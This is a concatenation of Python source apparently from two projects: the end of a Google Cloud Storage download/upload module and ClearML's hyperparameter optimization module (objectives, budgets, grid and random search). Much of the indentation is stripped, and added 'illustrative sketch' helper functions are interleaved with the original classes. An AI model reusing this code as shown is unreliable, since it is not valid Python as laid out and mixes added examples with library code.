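# The bucket and object names are made up, and the function is defined but never
# called here, so the module keeps no import-time side effects or GCS dependencies.
def _gcsio_usage_sketch():
    gcs = GcsIO()
    # Write an object, then read it back through the buffered file interface.
    with gcs.open('gs://my-bucket/example.txt', 'w') as f:
        f.write(b'hello world')
    with gcs.open('gs://my-bucket/example.txt', 'r') as f:
        data = f.read()
    assert data == b'hello world'
    # Metadata helpers defined above.
    assert gcs.exists('gs://my-bucket/example.txt')
    sizes = gcs.list_prefix('gs://my-bucket/')
    gcs.delete('gs://my-bucket/example.txt')
    return sizes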
class GcsDownloader(Downloader):
def __init__(self, client, path, buffer_size):
self._client = client
self._path = path
self._bucket, self._name = parse_gcs_path(path)
self._buffer_size = buffer_size
# Get object state.
self._get_request = (storage.StorageObjectsGetRequest(
bucket=self._bucket, object=self._name))
try:
metadata = self._get_object_metadata(self._get_request)
except HttpError as http_error:
if http_error.status_code == 404:
raise IOError(errno.ENOENT, 'Not found: %s' % self._path)
else:
logging.error('HTTP error while requesting file %s: %s', self._path,
http_error)
raise
self._size = metadata.size
# Ensure read is from file of the correct generation.
self._get_request.generation = metadata.generation
# Initialize read buffer state.
self._download_stream = io.BytesIO()
self._downloader = transfer.Download(
self._download_stream, auto_transfer=False, chunksize=self._buffer_size)
self._client.objects.Get(self._get_request, download=self._downloader)
@retry.with_exponential_backoff(
retry_filter=retry.retry_on_server_errors_and_timeout_filter)
def _get_object_metadata(self, get_request):
return self._client.objects.Get(get_request)
@property
def size(self):
return self._size
def get_range(self, start, end):
self._download_stream.seek(0)
self._download_stream.truncate(0)
self._downloader.GetRange(start, end - 1)
return self._download_stream.getvalue()
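# Illustrative sketch (not part of the original module): the seek/truncate/getvalue
# buffer-reuse idiom that get_range above relies on, shown with an in-memory
# BytesIO only, so it runs without any GCS access.
def _buffer_reuse_sketch():
    buf = io.BytesIO()
    buf.write(b'first range')
    # Reset the buffer before the next range is downloaded into it.
    buf.seek(0)
    buf.truncate(0)
    buf.write(b'second range')
    assert buf.getvalue() == b'second range'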
class GcsUploader(Uploader):
def __init__(self, client, path, mime_type):
self._client = client
self._path = path
self._bucket, self._name = parse_gcs_path(path)
self._mime_type = mime_type
# Set up communication with child thread.
parent_conn, child_conn = multiprocessing.Pipe()
self._child_conn = child_conn
self._conn = parent_conn
# Set up uploader.
self._insert_request = (storage.StorageObjectsInsertRequest(
bucket=self._bucket, name=self._name))
self._upload = transfer.Upload(
PipeStream(self._child_conn),
self._mime_type,
chunksize=WRITE_CHUNK_SIZE)
self._upload.strategy = transfer.RESUMABLE_UPLOAD
# Start uploading thread.
self._upload_thread = threading.Thread(target=self._start_upload)
self._upload_thread.daemon = True
self._upload_thread.last_error = None
self._upload_thread.start()
# TODO(silviuc): Refactor so that retry logic can be applied.
# There is retry logic in the underlying transfer library but we should make
# it more explicit so we can control the retry parameters.
@retry.no_retries # Using no_retries marks this as an integration point.
def _start_upload(self):
# This starts the uploader thread. We are forced to run the uploader in
# another thread because the apitools uploader insists on taking a stream
# as input. Happily, this also means we get asynchronous I/O to GCS.
#
# The uploader by default transfers data in chunks of 1024 * 1024 bytes at
# a time, buffering writes until that size is reached.
try:
self._client.objects.Insert(self._insert_request, upload=self._upload)
except Exception as e: # pylint: disable=broad-except
logging.error('Error in _start_upload while inserting file %s: %s',
self._path, traceback.format_exc())
self._upload_thread.last_error = e
finally:
self._child_conn.close()
def put(self, data):
try:
self._conn.send_bytes(data.tobytes())
except EOFError:
if self._upload_thread.last_error is not None:
raise self._upload_thread.last_error # pylint: disable=raising-bad-type
raise
def finish(self):
self._conn.close()
# TODO(udim): Add timeout=DEFAULT_HTTP_TIMEOUT_SECONDS * 2 and raise if
# isAlive is True.
self._upload_thread.join()
# Check for exception since the last put() call.
if self._upload_thread.last_error is not None:
raise self._upload_thread.last_error # pylint: disable=raising-bad-type
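# Illustrative sketch (not part of the original module): the pipe-plus-daemon-thread
# pattern GcsUploader uses to stream bytes to a background consumer. The consumer
# here only drains the pipe; no GCS calls are made, so this is safe to run.
def _pipe_streaming_sketch():
    parent_conn, child_conn = multiprocessing.Pipe()

    def consumer():
        while True:
            try:
                child_conn.recv_bytes()
            except EOFError:
                break

    t = threading.Thread(target=consumer)
    t.daemon = True
    t.start()
    parent_conn.send_bytes(b'payload')
    parent_conn.close()
    t.join()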
|
optimization.py
|
import hashlib
import json
import six
from copy import copy, deepcopy
from datetime import datetime
from itertools import product
from logging import getLogger
from threading import Thread, Event
from time import time
from typing import List, Set, Union, Any, Sequence, Optional, Mapping, Callable
from .job import ClearmlJob
from .parameters import Parameter
from ..backend_interface.util import get_or_create_project
from ..logger import Logger
from ..backend_api.services import workers as workers_service, tasks as tasks_service, events as events_service
from ..task import Task
logger = getLogger('clearml.automation.optimization')
class Objective(object):
"""
Optimization ``Objective`` class to maximize / minimize over all experiments. This class will sample a specific
scalar from all experiments, and maximize / minimize over single scalar (i.e., title and series combination).
``SearchStrategy`` and ``HyperParameterOptimizer`` use ``Objective`` in the strategy search algorithm.
"""
def __init__(self, title, series, order='max', extremum=False):
# type: (str, str, str, bool) -> ()
"""
Construct ``Objective`` object that will return the scalar value for a specific task ID.
:param str title: The scalar graph title to sample from.
:param str series: The scalar series title to sample from.
:param str order: The setting for maximizing or minimizing the objective scalar value.
The values are:
- ``max``
- ``min``
:param bool extremum: Return the global minimum / maximum reported metric value
The values are:
- ``True`` - Return the global minimum / maximum reported metric value.
- ``False`` - Return the last value reported for a specific Task. (Default)
"""
self.title = title
self.series = series
assert order in ('min', 'max',)
# normalize value so we always look for the highest objective value
self.sign = -1 if (isinstance(order, str) and order.lower().strip() == 'min') else +1
self._metric = None
self.extremum = extremum
def get_objective(self, task_id):
# type: (Union[str, Task, ClearmlJob]) -> Optional[float]
"""
Return a specific task scalar value based on the objective settings (title/series).
:param str task_id: The Task id to retrieve scalar from (or ``ClearMLJob`` object).
:return: The scalar value.
"""
# create self._metric
self._get_last_metrics_encode_field()
if isinstance(task_id, Task):
task_id = task_id.id
elif isinstance(task_id, ClearmlJob):
task_id = task_id.task_id()
# noinspection PyBroadException
try:
# noinspection PyProtectedMember
task = Task._query_tasks(
task_ids=[task_id], only_fields=['last_metrics.{}.{}'.format(self._metric[0], self._metric[1])])[0]
except Exception:
return None
metrics = task.last_metrics
if not metrics:
return None
# noinspection PyBroadException
try:
values = metrics[self._metric[0]][self._metric[1]]
if not self.extremum:
return values['value']
return values['min_value'] if self.sign < 0 else values['max_value']
except Exception:
return None
def get_current_raw_objective(self, task):
# type: (Union[ClearmlJob, Task]) -> (int, float)
"""
Return the current raw value (without sign normalization) of the objective.
:param str task: The Task or Job to retrieve scalar from (or ``ClearmlJob`` object).
:return: Tuple(iteration, value) if, and only if, the metric exists. None if the metric does not exist.
"""
if isinstance(task, Task):
task_id = task.id
elif isinstance(task, ClearmlJob):
task_id = task.task_id()
else:
task_id = task
if not task_id:
raise ValueError("Task ID not provided")
# send request
# noinspection PyBroadException
try:
# noinspection PyProtectedMember
res = Task._get_default_session().send(
events_service.ScalarMetricsIterHistogramRequest(
task=task_id, key='iter', samples=None),
)
except Exception:
res = None
if not res:
return None
response = res.wait()
if not response.ok() or not response.response_data:
return None
scalars = response.response_data
# noinspection PyBroadException
try:
return scalars[self.title][self.series]['x'][-1], scalars[self.title][self.series]['y'][-1]
except Exception:
return None
def get_objective_sign(self):
# type: () -> float
"""
Return the sign of the objective.
- ``+1`` - If maximizing
- ``-1`` - If minimizing
:return: Objective function sign.
"""
return self.sign
def get_objective_metric(self):
# type: () -> (str, str)
"""
Return the metric title, series pair of the objective.
:return: (title, series)
"""
return self.title, self.series
def get_normalized_objective(self, task_id):
# type: (Union[str, Task, ClearmlJob]) -> Optional[float]
"""
Return a normalized task scalar value based on the objective settings (title/series).
I.e., the objective is always to maximize the returned value.
:param str task_id: The Task id to retrieve scalar from.
:return: Normalized scalar value.
"""
objective = self.get_objective(task_id=task_id)
if objective is None:
return None
# normalize value so we always look for the highest objective value
return self.sign * objective
def get_top_tasks(self, top_k, optimizer_task_id=None):
# type: (int, Optional[str]) -> Sequence[Task]
"""
Return a list of Tasks of the top performing experiments, based on the title/series objective.
:param int top_k: The number of Tasks (experiments) to return.
:param str optimizer_task_id: Parent optimizer Task ID
:return: A list of Task objects, ordered by performance, where index 0 is the best performing Task.
"""
task_filter = {'page_size': int(top_k), 'page': 0}
if optimizer_task_id:
task_filter['parent'] = optimizer_task_id
order_by = self._get_last_metrics_encode_field()
if order_by and (order_by.startswith('last_metrics') or order_by.startswith('-last_metrics')):
parts = order_by.split('.')
if parts[-1] in ('min', 'max', 'last'):
title = hashlib.md5(str(parts[1]).encode('utf-8')).hexdigest()
series = hashlib.md5(str(parts[2]).encode('utf-8')).hexdigest()
minmax = 'min_value' if 'min' in parts[3] else ('max_value' if 'max' in parts[3] else 'value')
order_by = '{}last_metrics.{}.{}.{}'.format(
'-' if order_by and order_by[0] == '-' else '', title, series, minmax)
if order_by:
task_filter['order_by'] = [order_by]
return Task.get_tasks(task_filter=task_filter)
def _get_last_metrics_encode_field(self):
# type: () -> str
"""
Return encoded representation of the title/series metric.
:return: The objective title/series.
"""
if not self._metric:
title = hashlib.md5(str(self.title).encode('utf-8')).hexdigest()
series = hashlib.md5(str(self.series).encode('utf-8')).hexdigest()
self._metric = title, series
return '{}last_metrics.{}.{}.{}'.format(
'-' if self.sign > 0 else '', self._metric[0], self._metric[1],
('min_value' if self.sign < 0 else 'max_value') if self.extremum else 'value')
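# Illustrative sketch (not part of the original class): constructing an Objective
# and reading values for a task. The task ID is a made-up placeholder, and the
# function is defined but never called here.
def _objective_usage_sketch():
    objective = Objective(title='validation', series='loss', order='min')
    # Raw value as reported by the task (may be None if the metric is missing).
    raw = objective.get_objective('made_up_task_id')
    # Sign-normalized value: higher is always better, regardless of min/max order.
    normalized = objective.get_normalized_objective('made_up_task_id')
    return raw, normalized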
class Budget(object):
class Field(object):
def __init__(self, limit=None):
# type: (Optional[float]) -> ()
self.limit = limit
self.current = {}
def update(self, uid, value):
# type: (Union[str, int], float) -> ()
if value is not None:
try:
self.current[uid] = float(value)
except (TypeError, ValueError):
pass
@property
def used(self):
# type: () -> (Optional[float])
if self.limit is None or not self.current:
return None
return sum(self.current.values())/float(self.limit)
def __init__(self, jobs_limit, iterations_limit, compute_time_limit):
# type: (Optional[int], Optional[int], Optional[float]) -> ()
self.jobs = self.Field(jobs_limit)
self.iterations = self.Field(iterations_limit)
self.compute_time = self.Field(compute_time_limit)
def to_dict(self):
# type: () -> (Mapping[str, Mapping[str, float]])
# returned dict is Mapping[Union['jobs', 'iterations', 'compute_time'], Mapping[Union['limit', 'used'], float]]
current_budget = {}
jobs = self.jobs.used
current_budget['jobs'] = {'limit': self.jobs.limit, 'used': jobs if jobs else 0}
iterations = self.iterations.used
current_budget['iterations'] = {'limit': self.iterations.limit, 'used': iterations if iterations else 0}
compute_time = self.compute_time.used
current_budget['compute_time'] = {'limit': self.compute_time.limit, 'used': compute_time if compute_time else 0}
return current_budget
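# Illustrative sketch (not part of the original class): how Budget tracks usage as
# a fraction of each limit. Pure in-memory bookkeeping, so it runs as-is; the job
# IDs and numbers are made up.
def _budget_usage_sketch():
    budget = Budget(jobs_limit=10, iterations_limit=None, compute_time_limit=120)
    budget.jobs.update('job-1', 1)
    budget.jobs.update('job-2', 1)
    budget.compute_time.update('job-1', 30)
    # 'used' is the sum of reported values divided by the limit (None if no limit).
    assert budget.jobs.used == 0.2
    assert budget.iterations.used is None
    assert budget.compute_time.used == 0.25
    return budget.to_dict()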
class SearchStrategy(object):
"""
The base search strategy class. Inherit this class to implement your custom strategy.
"""
_tag = 'optimization'
_job_class = ClearmlJob # type: ClearmlJob
def __init__(
self,
base_task_id, # type: str
hyper_parameters, # type: Sequence[Parameter]
objective_metric, # type: Objective
execution_queue, # type: str
num_concurrent_workers, # type: int
pool_period_min=2., # type: float
time_limit_per_job=None, # type: Optional[float]
compute_time_limit=None, # type: Optional[float]
min_iteration_per_job=None, # type: Optional[int]
max_iteration_per_job=None, # type: Optional[int]
total_max_jobs=None, # type: Optional[int]
**_ # type: Any
):
# type: (...) -> ()
"""
Initialize a search strategy optimizer.
:param str base_task_id: The Task ID (str)
:param list hyper_parameters: The list of parameter objects to optimize over.
:param Objective objective_metric: The Objective metric to maximize / minimize.
:param str execution_queue: The execution queue to use for launching Tasks (experiments).
:param int num_concurrent_workers: The maximum number of concurrent running machines.
:param float pool_period_min: The time between two consecutive pools (minutes).
:param float time_limit_per_job: The maximum execution time per single job in minutes. When time limit is
exceeded, the job is aborted. (Optional)
:param float compute_time_limit: The maximum compute time in minutes. When time limit is exceeded,
all jobs aborted. (Optional)
:param int min_iteration_per_job: The minimum iterations (of the Objective metric) per single job (Optional)
:param int max_iteration_per_job: The maximum iterations (of the Objective metric) per single job.
When maximum iterations is exceeded, the job is aborted. (Optional)
:param int total_max_jobs: The total maximum jobs for the optimization process. The default value is ``None``,
for unlimited.
"""
super(SearchStrategy, self).__init__()
self._base_task_id = base_task_id
self._hyper_parameters = hyper_parameters
self._objective_metric = objective_metric
self._execution_queue = execution_queue
self._num_concurrent_workers = num_concurrent_workers
self.pool_period_minutes = pool_period_min
self.time_limit_per_job = time_limit_per_job
self.compute_time_limit = compute_time_limit
self.max_iteration_per_job = max_iteration_per_job
self.min_iteration_per_job = min_iteration_per_job
self.total_max_jobs = total_max_jobs
self._stop_event = Event()
self._current_jobs = []
self._pending_jobs = []
self._num_jobs = 0
self._job_parent_id = None
self._job_project_id = None
self._created_jobs_ids = {}
self._naming_function = None
self._job_project = {}
self.budget = Budget(
jobs_limit=self.total_max_jobs,
compute_time_limit=self.compute_time_limit if self.compute_time_limit else None,
iterations_limit=self.total_max_jobs * self.max_iteration_per_job if
self.max_iteration_per_job and self.total_max_jobs else None
)
self._validate_base_task()
self._optimizer_task = None
def start(self):
# type: () -> ()
"""
Start the Optimizer controller function loop(). If the calling process is stopped, the controller will stop
as well.
.. important::
This function returns only after the optimization is completed or :meth:`stop` was called.
"""
counter = 0
while True:
logger.debug('optimization loop #{}'.format(counter))
if not self.process_step():
break
if self._stop_event.wait(timeout=self.pool_period_minutes * 60.):
break
counter += 1
def stop(self):
# type: () -> ()
"""
Stop the current running optimization loop. Called from a different thread than the :meth:`start`.
"""
self._stop_event.set()
def process_step(self):
# type: () -> bool
"""
Abstract helper function; implementation is not required. Used by the default implementation of :meth:`start`.
Main optimization loop, called from the daemon thread created by :meth:`start`.
- Call monitor job on every ``ClearmlJob`` in jobs:
- Check the performance or elapsed time, and then decide whether to kill the jobs.
- Call create_job:
- Check if spare job slots exist, and if they do, call :meth:`create_job` to create a new job based on previously tested experiments.
:return: True, if continue the optimization. False, if immediately stop.
"""
updated_jobs = []
for job in self._current_jobs:
if self.monitor_job(job):
updated_jobs.append(job)
self._current_jobs = updated_jobs
pending_jobs = []
for job in self._pending_jobs:
if job.is_pending():
pending_jobs.append(job)
else:
self.budget.jobs.update(job.task_id(), 1)
self._pending_jobs = pending_jobs
free_workers = self._num_concurrent_workers - len(self._current_jobs)
# do not create more jobs if we hit the limit
if self.total_max_jobs and self._num_jobs >= self.total_max_jobs:
return bool(self._current_jobs)
# see how many free slots we have and create job
for i in range(max(0, free_workers)):
new_job = self.create_job()
if not new_job:
break
self._num_jobs += 1
new_job.launch(self._execution_queue)
self._current_jobs.append(new_job)
self._pending_jobs.append(new_job)
return bool(self._current_jobs)
def create_job(self):
# type: () -> Optional[ClearmlJob]
"""
Abstract helper function; implementation is not required. Used by the default implementation of :meth:`process_step`.
Create a new job if needed. return the newly created job. If no job needs to be created, return ``None``.
:return: A Newly created ClearmlJob object, or None if no ClearmlJob created.
"""
return None
def monitor_job(self, job):
# type: (ClearmlJob) -> bool
"""
Helper function; implementation is not required. Used by the default implementation of :meth:`process_step`.
Check if the job needs to be aborted or is already completed.
If this returns ``False``, the job was aborted / completed and should be taken off the current job list.
If there is a budget limitation, this call should update
``self.budget.compute_time.update`` / ``self.budget.iterations.update``
:param ClearmlJob job: A ``ClearmlJob`` object to monitor.
:return: False, if the job is no longer relevant.
"""
abort_job = self.update_budget_per_job(job)
if abort_job:
job.abort()
return False
return not job.is_stopped()
def update_budget_per_job(self, job):
abort_job = False
if self.time_limit_per_job:
elapsed = job.elapsed() / 60.
if elapsed > 0:
self.budget.compute_time.update(job.task_id(), elapsed)
if elapsed > self.time_limit_per_job:
abort_job = True
if self.compute_time_limit:
if not self.time_limit_per_job:
elapsed = job.elapsed() / 60.
if elapsed > 0:
self.budget.compute_time.update(job.task_id(), elapsed)
if self.max_iteration_per_job:
iterations = self._get_job_iterations(job)
if iterations > 0:
self.budget.iterations.update(job.task_id(), iterations)
if iterations > self.max_iteration_per_job:
abort_job = True
return abort_job
def get_running_jobs(self):
# type: () -> Sequence[ClearmlJob]
"""
Return the current running ClearmlJob.
:return: List of ClearmlJob objects.
"""
return self._current_jobs
def get_created_jobs_ids(self):
# type: () -> Mapping[str, dict]
"""
Return a Task IDs dict created by this optimizer until now, including completed and running jobs.
The values of the returned dict are the parameters used in the specific job
:return: dict of task IDs (str) as keys, and their parameters dict as values.
"""
return {job_id: job_val[1] for job_id, job_val in self._created_jobs_ids.items()}
def get_created_jobs_tasks(self):
# type: () -> Mapping[str, dict]
"""
Return a Task IDs dict created by this optimizer until now.
The values of the returned dict are the ClearmlJob.
:return: dict of task IDs (str) as keys, and their ClearmlJob as values.
"""
return {job_id: job_val[0] for job_id, job_val in self._created_jobs_ids.items()}
def get_top_experiments(self, top_k):
# type: (int) -> Sequence[Task]
"""
Return a list of Tasks of the top performing experiments, based on the controller ``Objective`` object.
:param int top_k: The number of Tasks (experiments) to return.
:return: A list of Task objects, ordered by performance, where index 0 is the best performing Task.
"""
# noinspection PyProtectedMember
top_tasks = self._get_child_tasks(
parent_task_id=self._job_parent_id or self._base_task_id,
order_by=self._objective_metric._get_last_metrics_encode_field(),
additional_filters={'page_size': int(top_k), 'page': 0})
return top_tasks
def get_objective_metric(self):
# type: () -> (str, str)
"""
Return the metric title, series pair of the objective.
:return: (title, series)
"""
return self._objective_metric.get_objective_metric()
def helper_create_job(
self,
base_task_id, # type: str
parameter_override=None, # type: Optional[Mapping[str, str]]
task_overrides=None, # type: Optional[Mapping[str, str]]
tags=None, # type: Optional[Sequence[str]]
parent=None, # type: Optional[str]
**kwargs # type: Any
):
# type: (...) -> ClearmlJob
"""
Create a Job using the specified arguments, ``ClearmlJob`` for details.
:return: A newly created Job instance.
"""
if parameter_override:
param_str = ['{}={}'.format(k, parameter_override[k]) for k in sorted(parameter_override.keys())]
if self._naming_function:
name = self._naming_function(self._base_task_name, parameter_override)
elif self._naming_function is False:
name = None
else:
name = '{}: {}'.format(self._base_task_name, ' '.join(param_str))
comment = '\n'.join(param_str)
else:
name = None
comment = None
tags = (tags or []) + [self._tag, 'opt' + (': {}'.format(self._job_parent_id) if self._job_parent_id else '')]
new_job = self._job_class(
base_task_id=base_task_id, parameter_override=parameter_override,
task_overrides=task_overrides, tags=tags, parent=parent or self._job_parent_id,
name=name, comment=comment,
project=self._job_project_id or self._get_task_project(parent or self._job_parent_id),
**kwargs)
self._created_jobs_ids[new_job.task_id()] = (new_job, parameter_override)
logger.info('Creating new Task: {}'.format(parameter_override))
return new_job
def set_job_class(self, job_class):
# type: (ClearmlJob) -> ()
"""
Set the class to use for the :meth:`helper_create_job` function.
:param ClearmlJob job_class: The Job Class type.
"""
self._job_class = job_class
def set_job_default_parent(self, job_parent_task_id, project_name=None):
# type: (Optional[str], Optional[str]) -> ()
"""
Set the default parent for all Jobs created by the :meth:`helper_create_job` method.
:param str job_parent_task_id: The parent Task ID.
:param str project_name: If specified, create the jobs in the specified project
"""
self._job_parent_id = job_parent_task_id
# noinspection PyProtectedMember
self._job_project_id = get_or_create_project(
session=Task._get_default_session(), project_name=project_name, description='HPO process spawned Tasks') \
if project_name else None
def set_job_naming_scheme(self, naming_function):
# type: (Optional[Callable[[str, dict], str]]) -> ()
"""
Set the function used to name a newly created job.
:param callable naming_function:
.. code-block:: py
naming_functor(base_task_name, argument_dict) -> str
"""
self._naming_function = naming_function
def set_optimizer_task(self, task):
# type: (Task) -> ()
"""
Set the optimizer task object to be used to store/generate reports on the optimization process.
Usually this is the current task of this process.
:param Task task: The optimizer`s current Task.
"""
self._optimizer_task = task
def _validate_base_task(self):
# type: () -> ()
"""
Check the base task exists and contains the requested Objective metric and hyper parameters.
"""
# check if the task exists
try:
task = Task.get_task(task_id=self._base_task_id)
self._base_task_name = task.name
except ValueError:
raise ValueError("Could not find base task id {}".format(self._base_task_id))
# check if the hyper-parameters exist:
task_parameters = task.get_parameters(backwards_compatibility=False)
missing_params = [h.name for h in self._hyper_parameters if h.name not in task_parameters]
if missing_params:
logger.warning('Could not find requested hyper-parameters {} on base task {}'.format(
missing_params, self._base_task_id))
# check if the objective metric exists (i.e. no typos etc)
if self._objective_metric.get_objective(self._base_task_id) is None:
logger.warning('Could not find requested metric {} report on base task {}'.format(
self._objective_metric.get_objective_metric(), self._base_task_id))
def _get_task_project(self, parent_task_id):
# type: (str) -> (Optional[str])
if not parent_task_id:
return
if parent_task_id not in self._job_project:
task = Task.get_task(task_id=parent_task_id)
self._job_project[parent_task_id] = task.project
return self._job_project.get(parent_task_id)
def _get_job_iterations(self, job):
# type: (Union[ClearmlJob, Task]) -> int
iteration_value = self._objective_metric.get_current_raw_objective(job)
return iteration_value[0] if iteration_value else -1
@classmethod
def _get_child_tasks_ids(
cls,
parent_task_id, # type: str
status=None, # type: Optional[Union[Task.TaskStatusEnum, Sequence[Task.TaskStatusEnum]]]
order_by=None, # type: Optional[str]
additional_filters=None # type: Optional[dict]
):
# type: (...) -> (Sequence[str])
"""
Helper function. Return a list of IDs of tasks tagged automl, with a specific ``status``, ordered by ``sort_field``.
:param str parent_task_id: The base Task ID (parent).
:param status: The current status of requested tasks (for example, ``in_progress`` and ``completed``).
:param str order_by: The field name to sort results.
Examples:
.. code-block:: py
"-last_metrics.title.series.min"
"last_metrics.title.series.max"
"last_metrics.title.series.last"
"execution.parameters.name"
"updated"
:param dict additional_filters: The additional task filters.
:return: A list of Task IDs (str)
"""
task_filter = {
'parent': parent_task_id,
# 'tags': [cls._tag],
# since we have auto archive we do not want to filter out archived tasks
# 'system_tags': ['-archived'],
}
task_filter.update(additional_filters or {})
if status:
task_filter['status'] = status if isinstance(status, (tuple, list)) else [status]
if order_by and (order_by.startswith('last_metrics') or order_by.startswith('-last_metrics')):
parts = order_by.split('.')
if parts[-1] in ('min', 'max', 'last'):
title = hashlib.md5(str(parts[1]).encode('utf-8')).hexdigest()
series = hashlib.md5(str(parts[2]).encode('utf-8')).hexdigest()
minmax = 'min_value' if 'min' in parts[3] else ('max_value' if 'max' in parts[3] else 'value')
order_by = '{}last_metrics.{}.{}.{}'.format(
'-' if order_by and order_by[0] == '-' else '', title, series, minmax)
if order_by:
task_filter['order_by'] = [order_by]
# noinspection PyProtectedMember
task_objects = Task._query_tasks(**task_filter)
return [t.id for t in task_objects]
@classmethod
def _get_child_tasks(
cls,
parent_task_id, # type: str
status=None, # type: Optional[Union[Task.TaskStatusEnum, Sequence[Task.TaskStatusEnum]]]
order_by=None, # type: Optional[str]
additional_filters=None # type: Optional[dict]
):
# type: (...) -> (Sequence[Task])
"""
Helper function. Return a list of tasks tagged automl, with specific ``status``, ordered by ``sort_field``.
:param str parent_task_id: The base Task ID (parent).
:param status: The current status of requested tasks (for example, ``in_progress`` and ``completed``).
:param str order_by: The field name to sort results.
Examples:
.. code-block:: py
"-last_metrics.title.series.min"
"last_metrics.title.series.max"
"last_metrics.title.series.last"
"execution.parameters.name"
"updated"
:param dict additional_filters: The additional task filters.
:return: A list of Task objects
"""
return [
Task.get_task(task_id=t_id) for t_id in cls._get_child_tasks_ids(
parent_task_id=parent_task_id,
status=status,
order_by=order_by,
additional_filters=additional_filters)
]
class GridSearch(SearchStrategy):
"""
Grid search strategy controller. Full grid sampling of every hyper-parameter combination.
"""
def __init__(
self,
base_task_id, # type: str
hyper_parameters, # type: Sequence[Parameter]
objective_metric, # type: Objective
execution_queue, # type: str
num_concurrent_workers, # type: int
pool_period_min=2., # type: float
time_limit_per_job=None, # type: Optional[float]
compute_time_limit=None, # type: Optional[float]
max_iteration_per_job=None, # type: Optional[int]
total_max_jobs=None, # type: Optional[int]
**_ # type: Any
):
# type: (...) -> ()
"""
Initialize a grid search optimizer
:param str base_task_id: The Task ID.
:param list hyper_parameters: The list of parameter objects to optimize over.
:param Objective objective_metric: The Objective metric to maximize / minimize.
:param str execution_queue: The execution queue to use for launching Tasks (experiments).
:param int num_concurrent_workers: The maximum number of concurrent running machines.
:param float pool_period_min: The time between two consecutive pools (minutes).
:param float time_limit_per_job: The maximum execution time per single job in minutes. When the time limit is
exceeded job is aborted. (Optional)
:param float compute_time_limit: The maximum compute time in minutes. When time limit is exceeded,
all jobs aborted. (Optional)
:param int max_iteration_per_job: The maximum iterations (of the Objective metric)
per single job. When exceeded, the job is aborted.
:param int total_max_jobs: The total maximum jobs for the optimization process. The default is ``None``, for
unlimited.
"""
super(GridSearch, self).__init__(
base_task_id=base_task_id, hyper_parameters=hyper_parameters, objective_metric=objective_metric,
execution_queue=execution_queue, num_concurrent_workers=num_concurrent_workers,
pool_period_min=pool_period_min, time_limit_per_job=time_limit_per_job,
compute_time_limit=compute_time_limit, max_iteration_per_job=max_iteration_per_job,
total_max_jobs=total_max_jobs, **_)
self._param_iterator = None
def create_job(self):
# type: () -> Optional[ClearmlJob]
"""
Create a new job if needed. Return the newly created job. If no job needs to be created, return ``None``.
:return: A newly created ClearmlJob object, or None if no ClearmlJob is created.
"""
try:
parameters = self._next_configuration()
except StopIteration:
return None
return self.helper_create_job(base_task_id=self._base_task_id, parameter_override=parameters)
def _next_configuration(self):
# type: () -> Mapping[str, str]
def param_iterator_fn():
hyper_params_values = [p.to_list() for p in self._hyper_parameters]
for state in product(*hyper_params_values):
yield dict(kv for d in state for kv in d.items())
if not self._param_iterator:
self._param_iterator = param_iterator_fn()
return next(self._param_iterator)
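# Illustrative sketch (not part of the original class): the itertools.product plus
# dict-merge idiom used by _next_configuration above, shown with plain dictionaries
# instead of Parameter objects. Values are made up; safe to run.
def _grid_expansion_sketch():
    lr_values = [{'lr': 0.01}, {'lr': 0.1}]
    batch_values = [{'batch_size': 32}, {'batch_size': 64}]
    combos = [dict(kv for d in state for kv in d.items())
              for state in product(lr_values, batch_values)]
    assert len(combos) == 4
    assert {'lr': 0.01, 'batch_size': 32} in combos
    return combos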
class RandomSearch(SearchStrategy):
"""
Random search strategy controller. Random uniform sampling of hyper-parameters.
"""
# Number of already chosen random samples before assuming we covered the entire hyper-parameter space
_hp_space_cover_samples = 42
def __init__(
self,
base_task_id, # type: str
hyper_parameters, # type: Sequence[Parameter]
objective_metric, # type: Objective
execution_queue, # type: str
num_concurrent_workers, # type: int
pool_period_min=2., # type: float
time_limit_per_job=None, # type: Optional[float]
compute_time_limit=None, # type: Optional[float]
max_iteration_per_job=None, # type: Optional[int]
total_max_jobs=None, # type: Optional[int]
**_ # type: Any
):
# type: (...) -> ()
"""
Initialize a random search optimizer.
:param str base_task_id: The Task ID.
:param list hyper_parameters: The list of Parameter objects to optimize over.
:param Objective objective_metric: The Objective metric to maximize / minimize.
:param str execution_queue: The execution queue to use for launching Tasks (experiments).
:param int num_concurrent_workers: The maximum number of concurrent running machines.
:param float pool_period_min: The time between two consecutive pools (minutes).
:param float time_limit_per_job: The maximum execution time per single job in minutes,
when time limit is exceeded job is aborted. (Optional)
:param float compute_time_limit: The maximum compute time in minutes. When time limit is exceeded,
all jobs aborted. (Optional)
:param int max_iteration_per_job: The maximum iterations (of the Objective metric)
per single job. When exceeded, the job is aborted.
:param int total_max_jobs: The total maximum jobs for the optimization process. The default is ``None``, for
unlimited.
"""
super(RandomSearch, self).__init__(
base_task_id=base_task_id, hyper_parameters=hyper_parameters, objective_metric=objective_metric,
execution_queue=execution_queue, num_concurrent_workers=num_concurrent_workers,
pool_period_min=pool_period_min, time_limit_per_job=time_limit_per_job,
compute_time_limit=compute_time_limit, max_iteration_per_job=max_iteration_per_job,
total_max_jobs=total_max_jobs, **_)
self._hyper_parameters_collection = set()
def create_job(self):
# type: () -> Optional[ClearmlJob]
"""
Create a new job if needed. Return the newly created job. If no job needs to be created, return ``None``.
:return: A newly created ClearmlJob object, or None if no ClearmlJob created
"""
parameters = None
# maximum tries to get a random set that is not already in the collection
for i in range(self._hp_space_cover_samples):
parameters = {}
for p in self._hyper_parameters:
parameters.update(p.get_value())
# hash the parameters dictionary
param_hash = hash(json.dumps(parameters, sort_keys=True))
# if this is a new set of parameters, use it.
if param_hash not in self._hyper_parameters_collection:
self._hyper_parameters_collection.add(param_hash)
break
# try again
parameters = None
# if we failed to find a random set of parameters, assume we selected all of them
if not parameters:
return None
return self.helper_create_job(base_task_id=self._base_task_id, parameter_override=parameters)
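# Illustrative sketch (not part of the original class): the hash-of-sorted-JSON
# de-duplication idiom RandomSearch uses to avoid re-sampling the same parameter
# set. Pure in-memory, so it runs as-is; the parameter values are made up.
def _random_dedup_sketch():
    seen = set()
    for params in ({'lr': 0.1, 'batch_size': 32}, {'lr': 0.1, 'batch_size': 32}):
        key = hash(json.dumps(params, sort_keys=True))
        if key in seen:
            return 'duplicate skipped'
        seen.add(key)
    return 'all unique'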
class HyperParameterOptimizer(object):
"""
Hyper-parameter search controller. Clones the base experiment, changes arguments and tries to maximize/minimize
the defined objective.
"""
_tag = 'optimization'
def __init__(
self,
base_task_id, # type: str
hyper_parameters, # type: Sequence[Parameter]
objective_metric_title, # type: str
objective_metric_series, # type: str
objective_metric_sign='min', # type: str
